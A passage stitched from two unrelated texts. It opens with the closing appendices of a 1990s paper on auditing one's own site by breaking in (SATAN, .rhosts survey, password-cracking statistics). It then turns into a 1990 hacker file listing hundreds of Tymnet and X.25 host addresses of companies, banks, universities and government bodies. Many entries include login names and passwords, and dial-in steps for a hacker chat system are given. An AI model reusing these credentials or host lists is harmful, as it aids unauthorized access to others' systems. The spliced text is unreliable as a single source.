to be the case, since the system crackers have shown little reticence to share their information with each other. While it is almost certain that some of the information presented here is new material to (aspiring) system crackers, and that some will use it to gain unauthorized entrance onto hosts, the evidence presented even by our ad hoc tests shows that there is a much larger number of insecure sites, simply because the system administrators don't know any better -- they aren't stupid or slow, they simply are unable to spend the very little free time that they have to explore all of the security issues that pertain to their systems. Combine that with no easy access to this sort of information and you have poorly defended systems. We (modestly) hope that this paper will provide badly-needed data on how systems are broken into, and further, to explain _why_ certain steps should be taken to secure a system. Knowing why something is a problem is, in our opinion, the real key to learning and to making an informed, intelligent choice as to what security really means for your site. ---- Appendix A: SATAN (Security Analysis Tool for Auditing Networks) Originally conceived some years ago, SATAN is actually the prototype of a much larger and more comprehensive vision of a security tool. In its current incarnation, SATAN remotely probes and reports various bugs and weaknesses in network services and windowing systems, as well as detailing as much generally useful information as possible about the target(s). It then processes the data with a crude filter and what might be termed an expert system to generate the final security analysis. While not particularly fast, it is extremely modular and easy to modify. SATAN consists of several sub-programs, each of which is an executable file (perl, shell, compiled C binary, whatever) that tests a host for a given potential weakness. Adding further test programs is as simple as putting an executable into the main directory with the extension ".sat"; the driver program will automatically execute it. The driver generates a set of targets (using DNS and a fast version of ping together to get "live" targets), and then executes each of the programs over each of the targets. A data filtering/interpreting program then analyzes the output, and lastly a reporting program digests everything into a more readable format. The entire package, including source code and documentation, will be made freely available to the public, via anonymous ftp and by posting it to one of the numerous source code groups on the Usenet. ---- Appendix B: An informal survey conducted on about a dozen Internet sites (educational, military, and commercial, with over 200 hosts and 40000 accounts) revealed that on the average, close to 10 percent of a site's accounts had .rhosts files. These files averaged six trusted hosts each; however, it was not uncommon to have well over one hundred entries in an account's .rhosts file, and on a few occasions, the number was over five hundred! (This is not a record one should be proud of owning.) In addition, _every_ site directly on the internet (one site was mostly behind a firewall) trusted a user or host at another site -- thus, the security of the site was not under the system administrators direct control. The larger sites, with more users and hosts, had a lower percentage of users with .rhosts files, but the size of .rhosts files increased, as well as the number of trusted off-site hosts. Although it was very difficult to verify how many of the entries were valid, with such hostnames such as "Makefile", "Message-Id:", and "^Cs^A^C^M^Ci^C^MpNu^L^Z^O", as well as quite a few wildcard entries, we question the wisdom of putting a site's security in the hands of its users. Many users (especially the ones with larger .rhosts files) attempted to put shell-style comments in their .rhosts files, which most UNIX systems attempt to resolve as valid host names. Unfortunately, an attacker can then use the DNS and NIS hostname spoofing techniques discussed earlier to set their hostname to "#" and freely log in. This puts a great many sites at risk (at least one major vendor ships their systems with comments in their /etc/hosts.equiv files.) You might think that these sites were not typical, and, as a matter of fact, they weren't. Virtually all of the administrators knew a great deal about security and write security programs for a hobby or profession, and many of the sites that they worked for did either security research or created security products. We can only guess at what a "typical" site might look like. ---- Appendix C: After receiving mail from a site that had been broken into from one of our systems, an investigation was started. In time, we found that the intruder was working from a list of ".com" (commercial) sites, looking for hosts with easy-to steal password files. In this case, "easy-to-steal" referred to sites with a guessable NIS domainname and an accessible NIS server. Not knowing how far the intruder had gotten, it looked like a good idea to warn the sites that were in fact vulnerable to password file theft. Of the 656 hosts in the intruder's hit list, 24 had easy-to-steal password files -- about one in twenty-five hosts! One third of these files contained at least one password-less account with an interactive shell. With a grand total of 1594 password-file entries, a ten-minute run of a publically-available password cracker (Crack) revealed more than 50 passwords, using nothing but a low-end Sun workstation. Another 40 passwords were found within the next 20 minutes; and a root password was found in just over an hour. The result after a few days of cracking: five root passwords found, 19 out of 24 password files (eighty percent) with at least one known password, and 259 of 1594 (one in six) passwords guessed. ---- Appendix D: How to get some free security resources on the Internet Mailing lists: o The CERT (Computer Emergency Response Team) advisory mailing list. Send e-mail to cert@cert.org, and ask to be placed on their mailing list. o The Phrack newsletter. Send an e-mail message to phrack@well.sf.ca.us and ask to be added to the list. o The Firewalls mailing list. Send the following line to majordomo@greatcircle.com: subscribe firewalls o Computer Underground Digest. Send e-mail to tk0jut2@mvs.cso.niu.edu, asking to be placed on the list. Free Software: COPS (Computer Oracle and Password System) is available via anonymous ftp from archive.cis.ohio-state.edu, in pub/cops/1.04+. The tcp wrappers are available via anonymous ftp from ftp.win.tue.nl, in pub/security. The latest version of berkeley sendmail is available via anonymous ftp from ftp.cs.berkeley.edu, in ucb/sendmail. Sources for ftpd and many other network utilities can be found in ftp.uu.net, in packages/bsd-sources. Source for ISS (Internet Security Scanner), a tool that remotely scans for various network vulnerabilities, is available via anonymous ftp from ftp.uu.net, in usenet/comp.sources.misc/volume40/iss. Securelib is available via anonymous ftp from ftp.uu.net, in usenet/comp.sources.misc/volume36/securelib. ---- Bibliography: Baldwin, Robert W., Rule Based Analysis of Computer Security, Massachusetts Institute of Technology, June 1987. Bellovin, Steve, Using the Domain Name System for System Break-ins, 1992 (unpublished). Massachusetts Institute of Technology, X Window System Protocol, Version 11, 1990. Shimomura, Tsutomu, private communication. Sun Microsystems, OpenWindows V3.0.1 User Commands, March 1992. ---- Suggested reading: Bellovin, Steve -- "Security Problms in the TCP/IP Protocol Suite", Computer Communication Review 19 (2), 1989; a comment by Stephen Kent appears in volume 19 (3), 1989. Garfinkle, Simson and Spafford, Gene, "Practical UNIX Security", O'Reilly and Associates, Inc., 1992. Hess, David, Safford, David, and Pooch, Udo, "A UNIX Network Protocol Study: Network Information Service", Computer Communication Review 22 (5) 1992. Phreak Accident, Playing Hide and Seek, UNIX style, Phrack, Volume Four, Issue Forty-Three, File 14 of 27. Ranum, Marcus, "Firewalls" internet electronic mailing list, Sept 1993. Schuba, Christoph, "Addressing Weaknesses in the Domain Name System Protocal", Purdue University, August 1993. Thompson, Ken, Reflections on Trusting Trust, Communications of the ACM 27 (8), 1984. --

Packet Networks I and other Tymnet Information by Digital Demon, 1990

************************************************************

PACKET NETWORKS I

written and compiled
BY

THE DIGITAL-DEMON
(C) DEC. 29, 1990

************************************************************

Well this phile started out is way as a plain informational text on tymnet. Well I figured not to long into the work that I might as well make it a general thing with just a the basics on tymnet. There are too many packet networks out there, but it is hard to find things just on one networks. So therefore this will be the first installment of a series on packet networks.

Included in this phile are dialups for local tymnet numbers. It is true that it is not necessary for everyone, but they are there just in case. This phile is meant for those novice to the networks, though the lists of nuas provided will be helpful for anyone in the field. Note that from TYMNET it requires special NUIs to access anything in the 3106 DNIC which is tymnet.

Many networks are not accessable from others do to refusing collect calls, non-supported by the network, or network congestion which happens a lot between systems that have few connections between them. If you have problems on anything within this phile please contact me on QSD and I will help you.

QSD for those that don’t know can be accessed by dialing 18002220555 (that is tymnet) entering an ‘a’ or an ‘o’ for terminal identifier (or one of the others presented within), for login type an NUI (in this case try ‘video’) and at the ‘;’ prompt type ‘208057040540’ from there you may see me on the system, if not, then write to ‘FED’ or ‘THANATOS’ in the mailing system.

CTR NUA NAME,UID,PW,REMARK
============================================================AUS 05052 28621000 ANGLO/AUSTRALIAN OBSERVATORY
AUS 05053 210003 MIDAS FOX TEST
CH 02284 64110115 DATA.STAR
CH 02284 6911003 NOS.CYBER,CIA0543,GUEST
CH 02284 79110650 KOMETH.TELEPAC
CH 02284 64110110 DATASTAR
CH ? 02284 68113150 MANAGEMENT JOINT TRUST
D 02624 5221040006 MEDICAL DOCS,COLOGNE
D 02624 5400030035
D 02624 5400030041
D 02624 5400030104
D 02624 5400030138
D 02624 5400030296 DFH2001I
D ? 02624 5400030519
D 02624 5400030566 DFH2001I
D 02624 5400090184 VAX
D 02624 5400091110 DT.MAILBOX
D 02624 5621040000 TELEBOX
D 02624 5621040025 OEVA
D ? 02624 5621040026 HOST
D 02624 5621040532
D 02624 5621040580 DYNAPAC MULTI-PAD.25
D 02624 5621040581 DYNAPAC MULTI-PAD.25
D 02624 5621040582
D 02624 5724740001 GERMAN CENTRE FOR TECH.
D 02624 5890040004 ACS.MUNICH
D 02624 5890040220 HOST
D 02624 5890040221 HOST
D 02624 5890040281 DATUS.PAD/PCX.PAD
D 02624 5890040510
D 02624 5890040522 PLESSEY.SEMICOND.VAX
F 02080 34020258
F 02080 91190258 LURE SYNCHROTRON SOURCE
GB 02342 12300120 D.I.SERV.
GB 02342 12301186
GB 02342 1300011
GB 02342 1440012
GB 02342 15710104
GB 02342 19200118 AUTONET
GB 02342 19200146
GB 02342 19200154
GB 02342 19200190 PERG.INFOLN.
GB 02342 19200203
GB 02342 19200222
GB 02342 19200300 UNI.LONDON
GB 02342 19200304
GB 02342 19200394 SIANET
GB 02342 19200871
GB 02342 19201002
GB 02342 1920100515 HOSTESS
GB 02342 1920100615
GB 02342 192010100513
GB 02342 1920101013
GB 02342 1920101030
GB 02342 19709111
GB 02342 206411411 UNI.ESSEX
GB 02342 20641141 UNI.ESSEX
GB 02342 22236236
GB 02342 2271511 —,GUEST,FRIEND (CALL PIP)
GB 02342 2790014302 ALCATEL
GB 02342 12080105
GB 02342 12300120 DIALOG VIA DIALNET IN LONDON
GB 02342 123002920
GB 02342 12301281 ONE TO ONE COMMS
GB 02342 13900101 ALVEY MAIL FACILITY
GB 02342 1390010150 ALVEY MAIL SYS FTP
GB 02342 19200100 UNI OF LONDON COMPUTING CENTRE
GB 02342 19200171
GB 02342 19200220 BRITISH LIBRARY ON-LINE SYSTEM
GB 02342 19200300 UNIVERSITY COLLEGE, LONDON
GB 02342 19200394 COMPUTER SERVICES, LONDON
GB 02342 1920100513 BRITISH TELECOM SERVICES
GB 02342 1920100620 P. ON-LINE BILLING SERVICE
GB 02342 1920102517
GB 02342 20641141 UNI OF ESSEX FTP
GB 02342 2223616300 CARDIFF UNIVERSITY MULTICS
GB 02342 27200110 GEAC 8000 ITI
GB 02342 27200112 HEWLETT PACKARD LABS, BRISTOL
GB 02342 31300101 PRIME OFFICE, EDINBURGH
GB 02342 31300102 FORESTRY COMMISSION FTP
GB 02342 31300105 LATTICE LOGIC LTD
GB 02342 31300107
GB 02342 34417117 ICL BRACKNELL
GB 02342 41200107
GB 02342 4620010243 ICL WEST GORTON ‘B’ SERVICE
GB 02342 4620010248 ICL WEST GORTON ‘X’ SERVICE
GB 02342 4620010277 FTP FOR ICL WEST GORTON PERQ
GB 02342 4620010277 ICL WEST GORTON PERQ
GB 02342 46240240 ICL KIDSGROVE
GB 02342 53300124 LEICESTER
GB 02342 5820010604 AGRENET CPSE
GB 02342 60227227 UNI OF LEICESTER FTP
GB 02342 61600133 IBM – SALE
GB 02342 61600133 IBM SALE FTP
GB 02342 61643365 ICLBRA
GB 02342 6164336543 ICL WEST GORTON ‘B’ SERVICE
GB 02342 6164336548 ICL WEST GORTON ‘X’ SERVICE
GB 02342 6164336577 FTP FOR ICL WEST GORTON PERQ
GB 02342 6164336577 ICL WEST GORTON PERQ
GB 02342 64200136 PRIMENET
GB 02342 70712217 HATFIELD POLYTECHNIC
GB 02342 75312212 BRITISH OXYGEN
GB 02342 75312212 THE WORLD REPORTER
GB 02342 78228282 ICL LETCHWORTH
GB 02342 78228288 ICL LETCHWORTH
GB 02342 90468168
GB 02342 90840111 SCICON, SOUTH ENGLAND
GB 02342 93765265 BRITISH LIBRARY LENDING DIVI.
IRL 02724 31540002 EUROKOM (UNIV COLLEGE DUBLIN)
IRL 02724 3154000803 IRL.HEA.TCD.DEC20 (TOPS-20)
IRL 02724 3159000630
NL 02041 294002 DUPHAR WEESP,HOLLAND
SF 02442 03008 VAX 11/750 IN FINLAND
USA 03020 58700900 DATAPAC
USA 03020 60100010 UNI.ALBERTA
USA 03106 0050
USA 03106,DELPHI TYMNET
USA 03110 2020014275
USA 03110 20423
USA 03110 4150002000 D.I.SERV.
USA 03110 60300020 COL.DARTMOUTH
USA 03106 GATEWAYS
USA 03106 000000 Unknown
USA 03106 000023
USA 03106 000032
USA 03106 000034
USA 03106 000050 NLM MIS bsd unix
USA 03106 000060
USA 03106 000065
USA 03106 000066 BCS ** to be investigated **
USA 03106 000071
USA 03106 000081 COMPUTONE ** to be investigated **
USA 03106 000093
USA 03106 000096 REMOTE COMPUTING
USA 03106 000098 LOCKHEED DATAPLAN
USA 03106 000101 SIO
USA 03106 000113 1=LINK SYS
3=BANK OF USA,ABACIS,DIRECTOR)
USA 03106 000155
USA 03106 000173 TYMNET/CODAN NET. Inter-link
USA 03106 000179 LBL
USA 03106 000188
USA 03106 000210
USA 03106 000227
USA 03106 000241 HOST A,4 BAIFS BANK OF AMERICA
S,3 SFDCS1
USA 03106 000249
USA 03106 000280 HONEYWELL MPL
USA 03106 000289 ROSS SYSTEM (32,26,2,3,12,20,21)
7,5,17,18,47,51,A – unknown VAX systems
14,15 – RSTS ROSS SYSTEMS
9,43,44,45,48 – MICRO VMS VAX
USA 03106 000307 INFOMEDIA SERVICE CENTRE ONE
USA 03106 000315
USA 03106 000327
USA 03106 000331 (VM/370 system)
USA 03106 000377 MONSANTO AD RESEARCH PRODUCTION
APPLICATION NETWORK
USA 03106 000379
USA 03106 000401 TMCS PUBLIC NETWORK
USA 03106 000411 TYMNET/BOSTON/TNS-PK1 interlink
USA 03106 000423 CORPORATE COMPUTER SERVICES
USA 03106 000424 (link to 4 VM/370 systems)
USA 03106 000428 AAMNET
USA 03106 000439 MIS 2 (cierr 1402)
USA 03106 000463 SIGNETICS VM/370
USA 03106 000464
USA 03106 000496
USA 03106 000497 UBS COMPUTER SYSTEMS (host)
USA 03106 000498
USA 03106 000515 ONTYME II
USA 03106 000581
USA 03106 000585 C/C/M
USA 03106 000619 SPNB VM/370
USA 03106 000632 TYMNET/TRWNET inter-link
USA 03106 000633 PUBLIC TYMNET/TRWNET INTERLINK
USA 03106 000636 LINK TO TRAC SYSTEMS (over one 120 terminal)
USA 03106 000646
USA 03106 000664
USA 03106 000674
USA 03106 000685 MTS-A RESEARCH (HOST) 10 – TOPS-20,
12 – UNKNOWN
14 – UNKNOWN,
20 – MTS(C) TOPS-20
30 – MTS(F) TOPS-20,
32 – UNKNOWN
USA 03106 000704 TYMNET-CUP(704)/DUBB-NTS(4) inter-link
USA 03106 000715 TYMNET TEST system
USA 03106 000729 (VM/370 system)
USA 03106 000731
USA 03106 000742 LADC L66A
USA 03106 000755 CORPORATE COMPUTER SERVICES
USA 03106 000759
USA 03106 000760 DEC host Solar Cae/Cam
USA 03106 000761 DOJ host
USA 03106 000788 TYMNET-6754/McGRAWHILL inter-link
USA 03106 000793 J&J HOST
USA 03106 000798
USA 03106 000800 link to: CSG VAX, CYBER 815, SB1,
SB2, SB3, SCN-NET
USA 03106 000821
USA 03106 000832 ONTYME II
USA 03106 000842
USA 03106 000850 CISL SERVICE MACHINE
USA 03106 000859
USA 03106 000871
USA 03106 000898 P&W
USA 03106 000932
USA 03106 001010 DITYMNET01
USA 03106 001024
USA 03106 001030
USA 03106 001036 IBM1
USA 03106 001042 IDC/370
USA 03106 001043
USA 03106 001053 STRATEGIC INFORMATION
USA 03106 001056 SYNTEX TIMESHARING
USA 03106 001105 HOST SGNY 1 – VAX II PRODUCTIONS SYSTEM
3 – VAX II PRODUCTIONS SYSTEM
(tried to 5)
USA 03106 001110
USA 03106 001134 COMPUSERVE
USA 03106 001141 MESSAGE SERVICE SYSTEM (FOX)
USA 03106 001143
USA 03106 001152
USA 03106 001158 TYMNET USER SERVICE
USA 03106 001227 ACF2
USA 03106 001288
USA 03106 001304 ONTYME II
USA 03106 001309
USA 03106 001316
USA 03106 001320
USA 03106 001328
USA 03106 001330 MULTICS, HVN 862-3642
USA 03106 001341
USA 03106 001358
USA 03106 001361 THOMPSON COMPONENTS-MOSTEK CORPORATION
USA 03106 001383 HOST 1,A – TILLINGHAST BENEFITS T.SHAR.SYS.
2,C – TILLINGHAST INSURANCE T.SHAR.SYS.
4,D – OUTDIALS
6 – TILLINGHAST VAX 8600
(tried to 10,G)
USA 03106 001391 SOCAL
USA 03106 001399 C80
USA 03106 001400 TMCS PUBLIC NETWORK
USA 03106 001410 DATALYNX/3274 TERMINAL
USA 03106 001417
USA 03106 001434 (host system) – double digits
VM is active, tried to BZ
USA 03106 001438
USA 03106 001443
USA 03106 001467 STN INTERNATIONAL
USA 03106 001482 FNOC DDS
USA 03106 001483 ADR HEADQUARTERS
USA 03106 001487
USA 03106 001488 (cierr 1402)
USA 03106 001502 ARGON NATIONAL LAB
USA 03106 001508 IDC/370
USA 03106 001509
USA 03106 001514 (HOST) DC-10
USA 03106 001519
USA 03106 001533 SBS DATA CENTRE
USA 03106 001557
USA 03106 001560
USA 03106 001572 PRIMECON NETWORK (system 50)
USA 03106 001578
USA 03106 001589
USA 03106 001594 CON138
USA 03106 001611
USA 03106 001612 TYMNET-NEWARK/TSN-MRI inter-link
USA 03106 001616 TYMNET-5027/McGRAW HILL inter-link
USA 03106 001624
USA 03106 001642 Host, A – CORNELLA (system choices displayed)
USA 03106 001659 BYTE INFORMATIO EXCHANGE,GUEST,GUEST
USA 03106 001663 PEOPLE LINK
USA 03106 001665
USA 03106 001709
USA 03106 001715 TYMNET/BOFANET inter-link
USA 03106 001727
USA 03106 001757
USA 03106 001763
USA 03106 001765
USA 03106 001766 PRIMENET
USA 03106 001769 S.C. JOHNSON & SON R & D COMPUTER SYSTEMS
USA 03106 001789 HOST WYLBUR.N – CICS TWX A,C,D,G,H,P,R,S,V,Z
USA 03106 001799 (HOST) classes: 5 – VM/370, 20,23,26 UNKNOWN
(TRIED TO 32)
USA 03106 001807
USA 03106 001817 MITEL Host (no luck up to sys 20)
USA 03106 001819 TMCS PUBLIC NETWORK
USA 03106 001831 MULTICS
USA 03106 001842
USA 03106 001844
USA 03106 001851
USA 03106 001853
USA 03106 001854
USA 03106 001857
USA 03106 001864 SUNGARDS CENTRAL COMPUTER FACILITY NETWORKS
USA 03106 001873 MULTICS MR10.2I
USA 03106 001874
USA 03106 001880
USA 03106 001881
USA 03106 001892 PRIMENET (certain hours)
USA 03106 001897
USA 03106 001912
USA 03106 001977
USA 03106 002040
USA 03106 002041
USA 03106 002046 MITEL CORP IN KANATA
USA 03106 002050 TYMNET/BOFANET inter-link,ABACIS,SFDCS1
1 – link,
2 – SFDCS1,DIRECTOR,
3 – ABACIS,ABACIS
A – ABACIS 2
(note, Abacis may be used as
U/N for many systems on tymnet)
USA 03106 002060
USA 03106 002070
USA 03106 002086
USA 03106 002095 COMODEX ONLINE SYSTEM
USA 03106 002098 D & B,COMMANDO,DIRECTOR,FUCK
USA 03106 002099 D & B,COMMANDO,ASSASIN,SHIT
USA 03106 002100 D & B,COMMANDO,DIRECTOR,FUCK,RAIDER
USA 03106 002109 TYMNET/15B (inter-link)
USA 03106 002164 MITRE SYSTEM
USA 03106 002179
USA 03106 002188
USA 03106 002196
USA 03106 002200
USA 03106 002201
USA 03106 002212
USA 03106 002222
USA 03106 002286 Primenet TFGI
USA 03106 002299 CONSILIUM
USA 03106 002306
USA 03106 002314
USA 03106 002320
USA 03106 002329 MFE
USA 03106 002330
USA 03106 002384
USA 03106 002387 ** TO BE INVESTIGATED **
USA 03106 002391
USA 03106 002408
USA 03106 002418 UNC VAX
USA 03106 002443 DATAHUB
USA 03106 002445
USA 03106 002446
USA 03106 002453 PRIMENET
USA 03106 002470
USA 03106 002496 NOS SOFTWARE SYSTEM
USA 03106 002519
USA 03106 002537
USA 03106 002539 TYMNET/CIDN Inter-link
USA 03106 002545 CENTRE FOR SEISMIC STUDIES
USA 03106 002578 SEL
USA 03106 002580 ** to be investigated **
USA 03106 002584 (HOST)
USA 03106 002602 MULTICS
USA 03106 002603 MULTICS system M
USA 03106 002609 CON5
USA 03106 002614 HOST
USA 03106 002623 VAX/VMS,GUEST
USA 03106 002624 SUNEX-2060 TOPS-20
USA 03106 002632
USA 03106 002635 QUOTDIAL
USA 03106 002646
USA 03106 002657
USA 03106 002667
USA 03106 002677 THE TIMES
USA 03106 002694 PVM3101,SPDS/MTAM, MLCM,VM/SP,STRATUS-1,STRATUS-2
USA 03106 002700 ANALYTICS SYSTNE
USA 03106 002709 AUTONET
USA 03106 002713
USA 03106 002730
USA 03106 002732
USA 03106 002744
USA 03106 002765 MULTICS
USA 03106 002768 (cierr 1402)
USA 03106 002779 SCJ TIMESHARING
USA 03106 002790 VM/370
USA 03106 002800
USA 03106 002807 ISC
USA 03106 002824
USA 03106 002842
USA 03106 002843
USA 03106 002851 CHEM NETWORK DTSS
USA 03106 002864 RCA SEMICUSTOM
USA 03106 002871 (same as 5603)
USA 03106 002875 (cierr 1402) MTECH/COMMERCIAL SERVICES DIVISION
USA 03106 002889 ** to be investigated **
USA 03106 002901
USA 03106 002910 (CIERR 1402)
USA 03106 002921 CHRYSLER NETWORK
USA 03106 002971
USA 03106 002991 US MIS IS400
USA 03106 002995 VAIL VAX
USA 03106 002998 TYMNET/FIRN DATE NETWORK Inter-link
USA 03106 003002 MULTICS
USA 03106 003009
USA 03106 003028 DCOM class – 0
USA 03106 003030 DCOM class – 0 *investigate*
USA 03106 003036
USA 03106 003050 ATPCO FARE INFORMATION SYSTEM
USA 03106 003062 (Host) class 0,1 ** to be investigated **
USA 03106 003079 VM/370
USA 03106 003092 TYMNET/PROTECTED ACCESS SERVICE SYS. Inter-link
USA 03106 003168 VM/370
USA 03106 003214 VM/370
USA 03106 003220 VM/370
USA 03106 003221 VM/370
USA 03106 003248
USA 03106 003284 COMPUFLIGHT
USA 03106 003286 VAX
USA 03106 003295 TYMNET/PROTECTED ACCESS SERVICE SYSTEMS
Inter-link,ABACIS
USA 03106 003297 TYMNET/PROTECTED ACCESS SERVICE SYSTENS
Inter-link,ABACIS
USA 03106 003310
USA 03106 003321
USA 03106 003356
USA 03106 003365
USA 03106 003373 IOCSQ
USA 03106 003394 (HOST WYN) 1 – VM/370,
2 – VM/370,
3 – IKJ53020A,
5 – VM/370
6 – NARDAC – NARDAC
USA 03106 003420
USA 03106 003443 ** TO BE INVESTIGATED **
USA 03106 003520
USA 03106 003527
USA 03106 003529 (CIERR 1402)
USA 03106 003534
USA 03106 003564 (CIERR 1402)
USA 03106 003568 OAK TREE SYSTEMS LTD
USA 03106 003572 NORTH AMERICA DATA CENTRE
USA 03106 003579
USA 03106 003604 VM/370
USA 03106 003605
USA 03106 003623
USA 03106 003797
USA 03106 003828 TYMNET/AKNET Inter-link
USA 03106 003831
USA 03106 003846 (same as 5603)
USA 03106 003879 (CIERR 1402)
USA 03106 003882 BEKINS COMPANY MUS/XA ACF/VTAM NETWORK
USA 03106 003946
USA 03106 003973 FORD -ELECTRICAL ELECTRONIC DIRECTORY
USA 03106 003994 FORD -ELECTRICAL ELECTRONIC DIRECTORY
USA 03106 004007
USA 03106 004016
USA 03106 004028 MDS-870
USA 03106 004041 RCA GLOBCOM’S PACKET SWITCHING SERICE
USA 03106 004092
USA 03106 004125
USA 03106 004129 —,ABACIS
USA 03106 004131 —,ABACIS
USA 03106 004137 TSO, VM/370
USA 03106 004173
USA 03106 004174 VM/370
USA 03106 004202
USA 03106 004206 MAINSTREAMS
USA 03106 004210
USA 03106 004288
USA 03106 004296
USA 03106 004341 (HOST) 2 – VM/370, T – VM/370, 1,3,4,A,C,E,Z
USA 03106 004350 AEC ** TO BE INVESTIGATED **
USA 03106 004365 NATIONAL LIB.OF MEDICINE’S TOXIC.DATA NETWORK
USA 03106 004389 BUG BUSTING MACHINE OF NYN
USA 03106 004468 BETINS COQ,6R5u(VACF/VTAM NETWORK
USA 03106 004472 ROLM CBX DATA-SWITCHING
USA 03106 004499 MRCA
USA 03106 004514 US MISS (IS400)
USA 03106 004530 (Host) active centre AA, ** investigate ! **
USA 03106 004541 (Host)
USA 03106 004545 HMN
USA 03106 004555 #2 CASTER BACKUP
USA 03106 004562
USA 03106 004573
USA 03106 004579
USA 03106 004580 TSO
USA 03106 004619
USA 03106 004645
USA 03106 004702 PRIMENET
USA 03106 004706 (Host)
USA 03106 004726 NALCOCS DEC-10
USA 03106 004743 TYMNET INFO SERVICE
USA 03106 004755 STORE DEVELOPMENT MACHINE
USA 03106 004759 (Host)
USA 03106 004791 MIS GROUP/CAD DIVISION/COMPUTERLAND CORP.
USA 03106 004828 VTAM007
USA 03106 004865 GAB BUSINESS SERVICES
USA 03106 004869
USA 03106 004898
USA 03106 004946
USA 03106 004949
USA 03106 004956 (Host) 0 – Vax,
1 – KL1,
2 – KL,
3 – IBM,
8 – VAX 2,
11 – PC1-130
USA 03106 004957 NEC SEMI-CUSTOM DESIGN CENTRE
USA 03106 005018 (Host)
USA 03106 005034 (cierr 1402)
USA 03106 005058
USA 03106 005062 UIS SUPPB=MQDIRNET
USA 03106 005080
USA 03106 005082 COMPAQ
USA 03106 005107
USA 03106 005119 (Host)
USA 03106 005124 OPERATIONAL INFO SYSTEM VAX
USA 03106 005136 ** to be investogated **
USA 03106 005224 (Host)
USA 03106 005229 UNI.OF PENCILVANIA SCHOOL OF ARTS AND SCIENCE
USA 03106 005267 CHANEL 01
USA 03106 005320 (Host) US DIGMAL COMPUTER SERVICES
USA 03106 005433
USA 03106 005438
USA 03106 005453
USA 03106 005463 VM/370
USA 03106 005528 STRATUS/32
USA 03106 005531 STRATUS/32
USA 03106 005539 VA II/730
USA 03106 005564 STRATUS/32
USA 03106 005566 Host sys A,1 – 3M TRAC SERVICE system ALICE
B,2 – 3M TRAC SERVICE system BAMBI
3 – 3M TRAC SERVICE system CHIP
4 – 3M TRAC SERVICE system DALE
5 – 3M TRAC SERVICE system ELLIOT
6 – 3M TRAC SERVICE system FLOWER
12,7 – 3M TRAC SERVICE system GRUMPY
8 – TRAC CLUSTER VIRGO, SYSTEM HAPPY
9 – TRAC CLUSTER VIRGO, SYSTEM ISABEL
10 – TRAC CLUSTER VIRGO, SYSTEM JUMBO
11 – TRAC CLUSTER VIRGO, SYSTEM KANGA
13 – VAX
18 – DIGITAL ETHERNET
28 – unknown
31 – CIERR 1402
32 – CIERR 1402
33 – CIERR 1402
34 – CIERR 1402
35 – CIERR 1402
36 – unknown
37 – CIERR 1402
38 – unknown
40 – CPU-STP-A
41 – CIERR 1402
43 – UNKNOWN
44 – ATLAS VAX
45 – FAXON INFO SERVICE
46 – ELECTRICAL PRODUCTS
LABORATORY VASX II/750
47,48,49 – unknown
52 – SERC COMPUTER RESOURCES VAX
53 – unknown
54 – SERC COMPUTER RESOURCES VAX
55 – BDS UNIX
81,61 – TRAC CLUSTER LIBRA system LADY
62 – TRAC CLUSTER LIBRA system MICKEY
63 – TRAC CLUSTER GEMINI system NEMO
64 – TRAC CLUSTER GEMINI system OWL
65 – TRAC CLUSTER LIBRA system PLUTO
67 – TRAC CLUSTER GEMINI system QUASAR
68 – unknown
70 – TRAC TIMESHARING VAX
71 – TRAC TIMESHARING VAX
72 – TRACE TIMESHARING VAX
73 – DIGITAL ETHERNET TERMINAL SERVER
74 – TRAC TIMESHARING VAX
76 – TRAC TIMESHARING VAX
81 – TRAC TIMESHARING VAX
USA 03106 005569 STRATUS/32
USA 03106 005571 STRATUS/32
USA 03106 005603 (Host) systems 1,2,3,4,5,C (5=Outdial)
USA 03106 005622
USA 03106 005683 TECHNICAL SUPPORT PRODUCTIONS
USA 03106 005697
USA 03106 005702 AUTH
USA 03106 005704 SPOOL
USA 03106 005705
USA 03106 005706
USA 03106 005707
USA 03106 005708 IFPSE
USA 03106 005709 IFPSE
USA 03106 005711 IFXMP
USA 03106 005712
USA 03106 005725 PRIMENET
USA 03106 005744 (Cierr 1402)
USA 03106 005755 Host system, active links = A,B,C,E,F,H,G,I,
J,K,L,M,O,P,Q,R,
S,T,U,V,W,X,Y,Z
USA 03106 005758 SEI/MUS SYSTEM
USA 03106 005805
USA 03106 005818 CORPORATE MANAGEMENT INFO SYSTEMS
USA 03106 005846 (Host)
USA 03106 005897
USA 03106 005903
USA 03106 005941
USA 03106 005969 PLESSEY SEMICONDUCTORS-IRVINE
USA 03106 005984 CREDIT AGRICOLE-USA
USA 03106 006019 PRIMENET
USA 03106 006046
USA 03106 006093 NALCO CHEMICAL COMPANY NETWORK
USA 03106 006121 CORPORATE MANAGEMENT INFO SERVICE
USA 03106 006187
USA 03106 006190 CLEVELAND
USA 03106 006191
USA 03106 006227
USA 03106 006251
USA 03106 006281 EDCS
USA 03106 006283 EDCS
USA 03106 006296
USA 03106 006432 EASYLINK
USA 03106 006434 EASYLINK
USA 03106 006440
USA 03106 006590 US CENTRA SERVICE
USA 03106 006597
USA 03106 006686
USA 03106 006722 INTERNATIONAL NETWORK
USA 03106 006828
USA 03106 006832 A&A DATANET (SYSTEMS 1,8,0,14)
USA 03106 006833 (GO AWAY)
USA 03106 006834
USA 03106 006835 TOC
USA 03106 006867 DATABILITY TIMESHARING SYSTEM II
USA 03106 006994
USA 03106 007028
USA 03106 007103
USA 03106 007177
USA 03106 007272 (CIERR 1402)
USA 03106 007351 PRIMENET
USA 03106 007352 PRIMENET
USA 03106 007377
USA 03106 007596 (Host) A – VM/370, B – VM/370
USA 03106 007640

NAME NUA
———————————————————-

Us Telemail |031102020014 | |KKCHUNG |520dlk79 |
Uni Brighton |023427050015 | |GUEST |WELCOME |
Sysnet Wien |023224221142 |MAI |Gast |Gast |
|023424126010604 |,5020015 |Birch/Bryan|
Mehlbox HAM | 45400090184 | |Mike |Datexp |
E C H O | 0270448112 | |UK85041D |KS97516E |
B I X |031060057878 | |Rupert |———–|
E X C O N |022849911102001 |Call 130 |EX |
|023422351919169 |,49000001 |Mehlbox/User
Emery ADO | 03106907626 | |CICS4^D |CICS4 |
Netztest AU | 05053210001 | | | |
The Source |0311030100038| |Jinatari |Subscribe |
The Source |0311030100038| |Josh1 |ST861229 |
Delphi |0311061703088| |————|———–|
Nuclear Res. | 03110500061 | | | |
Datapac | 030292100086| |————|———–|
Dallas | 0310600787 | |————|———–|
A M P |023422020010700 |Use Demo Account |
Canada |0302067100901| |————|———–| Telenet |0311020200141| |Telemailintl|Intl Phones|
Sharp Comp. |0234219200203| | | | College LON |0234219200333| | | |
Brit. TELECOM |023421920101030 |,TSTB | |
